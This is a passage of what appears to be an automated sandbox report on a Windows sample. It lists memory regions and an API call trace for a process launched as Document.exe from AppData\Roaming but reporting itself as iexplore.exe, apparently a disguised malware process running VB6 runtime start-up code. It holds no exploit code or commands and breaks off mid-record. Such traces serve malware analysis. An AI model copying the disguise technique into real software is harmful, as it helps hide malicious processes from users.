Region: id = 1696 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1697 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 1698 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1699 start_va = 0xac0000 end_va = 0xb65fff entry_point = 0xac0000 region_type = mapped_file name = "iexplore.exe" filename = "\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe") Region: id = 1700 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1701 start_va = 0x77e20000 end_va = 0x77f9ffff entry_point = 0x77e20000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1702 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1703 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1704 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1705 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1706 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1707 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1708 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1711 start_va = 0x400000 end_va = 0x442fff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1712 start_va = 0x540000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1713 start_va = 0x752a0000 end_va = 0x752a7fff entry_point = 0x752a0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1714 start_va = 0x752b0000 end_va = 0x7530bfff entry_point = 0x752b0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1715 start_va = 0x75310000 end_va = 0x7534efff entry_point = 0x75310000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1716 start_va = 0x6b0000 end_va = 0x7affff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 1717 start_va = 0x75f40000 end_va = 0x75f85fff entry_point = 0x75f40000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1718 start_va = 0x76220000 end_va = 0x7632ffff entry_point = 0x76220000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1719 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x0 region_type = private name = "private_0x0000000077a20000" filename = "" Region: id = 1720 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x0 region_type = private name = "private_0x0000000077b20000" filename = "" Region: id = 1721 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1722 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1723 start_va = 0x72940000 end_va = 0x72a92fff entry_point = 0x72940000 region_type = mapped_file name = "msvbvm60.dll" filename = "\\Windows\\SysWOW64\\msvbvm60.dll" (normalized: "c:\\windows\\syswow64\\msvbvm60.dll") Region: id = 1724 start_va = 0x75970000 end_va = 0x7597bfff entry_point = 0x75970000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1725 start_va = 0x75980000 end_va = 0x759dffff entry_point = 0x75980000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1726 start_va = 0x759e0000 end_va = 0x759f8fff entry_point = 0x759e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1727 start_va = 0x75a10000 end_va = 0x75abbfff entry_point = 0x75a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1728 start_va = 0x75cf0000 end_va = 0x75e4bfff entry_point = 0x75cf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1729 start_va = 0x75fa0000 end_va = 0x7603cfff entry_point = 0x75fa0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1730 start_va = 0x760d0000 end_va = 0x761bffff entry_point = 0x760d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1731 start_va = 0x76490000 end_va = 0x7652ffff entry_point = 0x76490000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1732 start_va = 0x76720000 end_va = 0x767aefff entry_point = 0x76720000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1733 start_va = 0x76a70000 end_va = 0x76afffff entry_point = 0x76a70000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1734 start_va = 0x77810000 end_va = 0x77819fff entry_point = 0x77810000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1735 start_va = 0x77820000 end_va = 0x7791ffff entry_point = 0x77820000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1736 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1737 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1738 start_va = 0x30000 end_va = 0x3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1739 start_va = 0x7b0000 end_va = 0x937fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 1740 start_va = 0x75c00000 end_va = 0x75c5ffff entry_point = 0x75c00000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1741 start_va = 0x75e50000 end_va = 0x75f1bfff entry_point = 0x75e50000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1742 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1743 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1744 start_va = 0xb70000 end_va = 0xcf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b70000" filename = "" Region: id = 1745 start_va = 0xd00000 end_va = 0x20fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 1746 start_va = 0x120000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 1747 start_va = 0x2100000 end_va = 0x24fffff entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 1748 start_va = 0x2500000 end_va = 0x27cefff entry_point = 0x2500000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1749 start_va = 0x27d0000 end_va = 0x299ffff entry_point = 0x0 region_type = private name = "private_0x00000000027d0000" filename = "" Region: id = 1750 start_va = 0x310000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 1751 start_va = 0x75210000 end_va = 0x7528ffff entry_point = 0x75210000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1752 start_va = 0x27d0000 end_va = 0x295ffff entry_point = 0x0 region_type = private name = "private_0x00000000027d0000" filename = "" Region: id = 1753 start_va = 0x2960000 end_va = 0x299ffff entry_point = 0x0 region_type = private name = "private_0x0000000002960000" filename = "" Region: id = 1754 start_va = 0x450000 end_va = 0x52efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1755 start_va = 0x940000 end_va = 0xa6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 1756 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 1757 start_va = 0x150000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1758 start_va = 0x74ba0000 end_va = 0x74ba8fff entry_point = 0x74ba0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1759 start_va = 0x757f0000 end_va = 0x7584efff entry_point = 0x757f0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 1760 start_va = 0x751f0000 end_va = 0x75202fff entry_point = 0x751f0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1761 start_va = 0x160000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 1762 start_va = 0x27e0000 end_va = 0x28dffff entry_point = 0x0 region_type = private name = "private_0x00000000027e0000" filename = "" Region: id = 1763 start_va = 0x2920000 end_va = 0x295ffff entry_point = 0x0 region_type = private name = "private_0x0000000002920000" filename = "" Region: id = 1764 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1765 start_va = 0x76450000 end_va = 0x76484fff entry_point = 0x76450000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1766 start_va = 0x77df0000 end_va = 0x77df5fff entry_point = 0x77df0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1767 start_va = 0x29a0000 end_va = 0x2adffff entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 1768 start_va = 0x76b00000 end_va = 0x77749fff entry_point = 0x76b00000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1769 start_va = 0x75c60000 end_va = 0x75cb6fff entry_point = 0x75c60000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1770 start_va = 0x130000 end_va = 0x130fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 1771 start_va = 0x75950000 end_va = 0x7595afff entry_point = 0x75950000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1772 start_va = 0x755e0000 end_va = 0x755e7fff entry_point = 0x755e0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 1773 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 1774 start_va = 0x76040000 end_va = 0x760c2fff entry_point = 0x76040000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1775 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1776 start_va = 0x755c0000 end_va = 0x755ddfff entry_point = 0x755c0000 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\SysWOW64\\shacct.dll" (normalized: "c:\\windows\\syswow64\\shacct.dll") Region: id = 1777 start_va = 0x75460000 end_va = 0x754e3fff entry_point = 0x75460000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 1778 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1779 start_va = 0x755a0000 end_va = 0x755b1fff entry_point = 0x755a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\SysWOW64\\samlib.dll" (normalized: "c:\\windows\\syswow64\\samlib.dll") Region: id = 1780 start_va = 0x9a0000 end_va = 0x9dffff entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 1781 start_va = 0xa60000 end_va = 0xa6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 1782 start_va = 0x2b30000 end_va = 0x2c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b30000" filename = "" Region: id = 1783 start_va = 0x75360000 end_va = 0x75454fff entry_point = 0x75360000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 1784 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 1785 start_va = 0x1b0000 end_va = 0x1bbfff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1786 start_va = 0x1e0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1787 start_va = 0x310000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 1788 start_va = 0x3c0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 1789 start_va = 0x75570000 end_va = 0x75599fff entry_point = 0x75570000 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll") Region: id = 1790 start_va = 0x1b0000 end_va = 0x1c4fff entry_point = 0x1b0000 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll") Region: id = 1791 start_va = 0x1f0000 end_va = 0x209fff entry_point = 0x1f0000 region_type = mapped_file name = "msvbvm60.dll" filename = "\\Windows\\SysWOW64\\msvbvm60.dll" (normalized: "c:\\windows\\syswow64\\msvbvm60.dll") Region: id = 1792 start_va = 0x757b0000 end_va = 0x757ebfff entry_point = 0x757b0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1793 start_va = 0x2c30000 end_va = 0x2d6ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c30000" filename = "" Region: id = 1794 start_va = 0x757a0000 end_va = 0x757a4fff entry_point = 0x757a0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 1990 start_va = 0x2d70000 end_va = 0x369ffff entry_point = 0x2d70000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Thread: id = 78 os_tid = 0xf0 [0199.592] GetVersion () returned 0x1db10106 [0199.593] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76220000 [0199.593] GetProcAddress (hModule=0x76220000, lpProcName="IsTNT") returned 0x0 [0199.593] VirtualAlloc (lpAddress=0x0, dwSize=0x400000, flAllocationType=0x2000, flProtect=0x4) returned 0x2100000 [0199.593] VirtualAlloc (lpAddress=0x2100000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x2100000 [0199.595] GetCurrentThreadId () returned 0xf0 [0199.595] GetCommandLineA () returned=" C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" [0199.596] GetEnvironmentStringsW () returned 0x6c4b78* [0199.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1501, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1501 [0199.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1501, lpMultiByteStr=0x1507d0, cbMultiByte=1501, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1501 [0199.596] FreeEnvironmentStringsW (penv=0x6c4b78) returned 1 [0199.596] GetStartupInfoA (in: lpStartupInfo=0x30f6e0 | out: lpStartupInfo=0x30f6e0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0199.596] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0199.596] GetFileType (hFile=0x0) returned 0x0 [0199.596] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0199.596] GetFileType (hFile=0x0) returned 0x0 [0199.596] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0199.596] GetFileType (hFile=0x0) returned 0x0 [0199.596] SetHandleCount (uNumber=0x20) returned 0x20 [0199.596] GetACP () returned 0x4e4 [0199.597] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x30f708 | out: lpCPInfo=0x30f708) returned 1 [0199.597] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72a4c528, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe")) returned 0x35 [0199.598] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76220000 [0199.598] GetProcAddress (hModule=0x76220000, lpProcName="IsProcessorFeaturePresent") returned 0x76235235 [0199.598] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0199.599] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x7c [0199.599] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x80 [0199.600] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0199.600] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x72a4e6c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0199.600] GetVersion () returned 0x1db10106 [0199.600] lstrcmpiW (lpString1="A", lpString2="B") returned -1 [0199.602] GetUserDefaultLCID () returned 0x409 [0199.602] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="A", cchCount1=-1, lpString2="B", cchCount2=-1) returned 1 [0199.602] GetSystemMetrics (nIndex=5) returned 1 [0199.603] GetSystemMetrics (nIndex=6) returned 1 [0199.603] GetSystemMetrics (nIndex=11) returned 32 [0199.603] GetSystemMetrics (nIndex=12) returned 32 [0199.603] GetSystemMetrics (nIndex=34) returned 132 [0199.603] GetSystemMetrics (nIndex=35) returned 38 [0199.603] GetSystemMetrics (nIndex=0) returned 1440 [0199.603] GetSystemMetrics (nIndex=1) returned 900 [0199.603] GetSystemMetrics (nIndex=32) returned 8 [0199.603] GetSystemMetrics (nIndex=33) returned 8 [0199.603] GetSystemMetrics (nIndex=42) returned 0 [0199.603] GetStockObject (i=15) returned 0x188000b [0199.603] GetStockObject (i=7) returned 0x1b00017 [0199.603] GetStockObject (i=6) returned 0x1b00018 [0199.603] GetStockObject (i=8) returned 0x1b00016 [0199.603] GetStockObject (i=4) returned 0x1900011 [0199.603] GetStockObject (i=2) returned 0x1900012 [0199.603] GetStockObject (i=0) returned 0x1900010 [0199.603] GetStockObject (i=5) returned 0x1900015 [0199.603] GetStockObject (i=13) returned 0x18a002e [0199.603] GetDC (hWnd=0x0) returned 0xffffffffb80109e1 [0199.603] GetTextExtentPointA (in: hdc=0xb80109e1, lpString="0", c=1, lpsz=0x30f704 | out: lpsz=0x30f704) returned 1 [0199.606] GetDeviceCaps (hdc=0xb80109e1, index=14) returned 1 [0199.606] GetDeviceCaps (hdc=0xb80109e1, index=12) returned 32 [0199.606] GetDeviceCaps (hdc=0xb80109e1, index=88) returned 96 [0199.606] GetDeviceCaps (hdc=0xb80109e1, index=90) returned 96 [0199.607] GetDeviceCaps (hdc=0xb80109e1, index=38) returned 32409 [0199.607] ReleaseDC (hWnd=0x0, hDC=0xb80109e1) returned 1 [0199.607] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x72a4e7d0 | out: ppMalloc=0x72a4e7d0*=0x75e366bc) returned 0x0 [0199.607] GetCurrentThreadId () returned 0xf0 [0199.608] GetStartupInfoA (in: lpStartupInfo=0x30fc48 | out: lpStartupInfo=0x30fc48*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0199.608] GetCurrentThreadId () returned 0xf0 [0199.608] GetCurrentThreadId () returned 0xf0 [0199.608] GetCommandLineA () returned=" C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" [0199.608] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe") returned 55 [0199.608] lstrcpyA (in: lpString1=0x30fba0, lpString2="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" [0199.608] SetErrorMode (uMode=0x8001) returned 0x8001 [0199.608] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x30f85c, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0199.609] GetUserDefaultLCID () returned 0x409 [0199.609] lstrcpyA (in: lpString1=0x30f55c, lpString2="*" | out: lpString1="*") returned="*" [0199.609] LoadStringA (in: hInstance=0x72940000, uID=0x7d1, lpBuffer=0x30f960, cchBufferMax=8 | out: lpBuffer="409") returned 0x3 [0199.609] GetSystemDefaultLCID () returned 0x409 [0199.609] GetUserDefaultLCID () returned 0x409 [0199.609] GetLocaleInfoA (in: Locale=0x400, LCType=0xe, lpLCData=0x30f96a, cchData=2 | out: lpLCData=".") returned 2 [0199.609] GetStockObject (i=13) returned 0x18a002e [0199.609] GetObjectA (in: h=0x18a002e, c=60, pv=0x30f930 | out: pv=0x30f930) returned 60 [0199.609] GetLocaleInfoA (in: Locale=0x409, LCType=0x80000003, lpLCData=0x30f92c, cchData=4 | out: lpLCData="ENU") returned 4 [0199.609] lstrcpyA (in: lpString1=0x30f95c, lpString2="EN" | out: lpString1="EN") returned="EN" [0199.609] lstrlenA (lpString="{xx}") returned 4 [0199.609] lstrlenA (lpString="VB98.CHM") returned 8 [0199.609] lstrcpyA (in: lpString1=0x72a4eae8, lpString2="VB98.CHM" | out: lpString1="VB98.CHM") returned="VB98.CHM" [0199.609] GetLocaleInfoA (in: Locale=0x409, LCType=0x80000003, lpLCData=0x30f92c, cchData=4 | out: lpLCData="ENU") returned 4 [0199.610] lstrcpyA (in: lpString1=0x30f95c, lpString2="EN" | out: lpString1="EN") returned="EN" [0199.610] lstrlenA (lpString="{xx}") returned 4 [0199.610] lstrlenA (lpString="VBENLR98.CHM") returned 12 [0199.610] lstrcpyA (in: lpString1=0x72a4ebf0, lpString2="VBENLR98.CHM" | out: lpString1="VBENLR98.CHM") returned="VBENLR98.CHM" [0199.610] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x30fa84, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe")) returned 0x35 [0199.610] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x30f980, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0199.610] lstrcpynA (in: lpString1=0x30f864, lpString2="C:\\Windows\\system32\\MSVBVM60.DLL", iMaxLength=260 | out: lpString1="C:\\Windows\\system32\\MSVBVM60.DLL") returned="C:\\Windows\\system32\\MSVBVM60.DLL" [0199.610] lstrlenA (lpString="C:\\Windows\\system32\\MSVBVM60.DLL") returned 32 [0199.610] lstrcpyA (in: lpString1=0x3c17b0, lpString2="C:\\Windows\\system32\\MSVBVM60.DLL" | out: lpString1="C:\\Windows\\system32\\MSVBVM60.DLL") returned="C:\\Windows\\system32\\MSVBVM60.DLL" [0199.610] LCMapStringA (in: Locale=0x409, dwMapFlags=0x200, lpSrcStr="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", cchSrc=-1, lpDestStr=0x30f844, cchDest=260 | out: lpDestStr="C:\\PROGRAM FILES (X86)\\INTERNET EXPLORER\\IEXPLORE.EXE") returned 54 [0199.611] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x30f948, dwRevision=0x1 | out: pSecurityDescriptor=0x30f948) returned 1 [0199.612] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x30f948, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x30f948) returned 1 [0199.612] CreateSemaphoreA (lpSemaphoreAttributes=0x30f95c, lInitialCount=0, lMaximumCount=2147483647, lpName="C:?PROGRAM FILES (X86)?INTERNET EXPLORER?IEXPLORE.EXE") returned 0x90 [0199.612] GetLastError () returned 0x0 [0199.612] GetVersionExA (in: lpVersionInformation=0x30f8c0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x30f8c0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 